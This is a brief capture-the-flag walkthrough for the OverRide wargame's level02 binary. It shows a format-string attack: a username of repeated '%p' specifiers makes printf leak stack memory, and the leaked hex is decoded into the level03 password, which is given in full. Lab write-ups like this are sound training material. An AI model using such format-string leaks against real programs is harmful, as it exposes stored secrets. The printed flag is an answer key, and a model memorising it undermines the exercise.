Using gdb, we can see that there is a call to fopen on address $0x400bb2
    (gdb) x/x 0x400bb2
    0x400bb2:       0x6d6f682f

We can see that it's opening the file '/home/users/level03/.pass'.
Later on there will be a call to printf that is unprotected and when we pass 99+ characters, the username we gave will be printed.
We will use that security issue to print the pointer in the program with '%p'.

    level02@OverRide:~$ ./level02 
    ===== [ Secure Access System v1.0 ] =====
    /***************************************\
    | You must login to access this system. |
    \**************************************/
    --[ Username: %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p   
    --[ Password: *****************************************
    0x7fffffffe4f0 (nil) 0x25 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a 0x7fffffffe6e8 0x1f7ff9a08 0x7025 (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) 0x100000000 (nil) 0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d (nil) 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070  does not have access!

Our .pass content is in there and using hex to string conversion we see that it is 
0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d
which translate to 'Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H'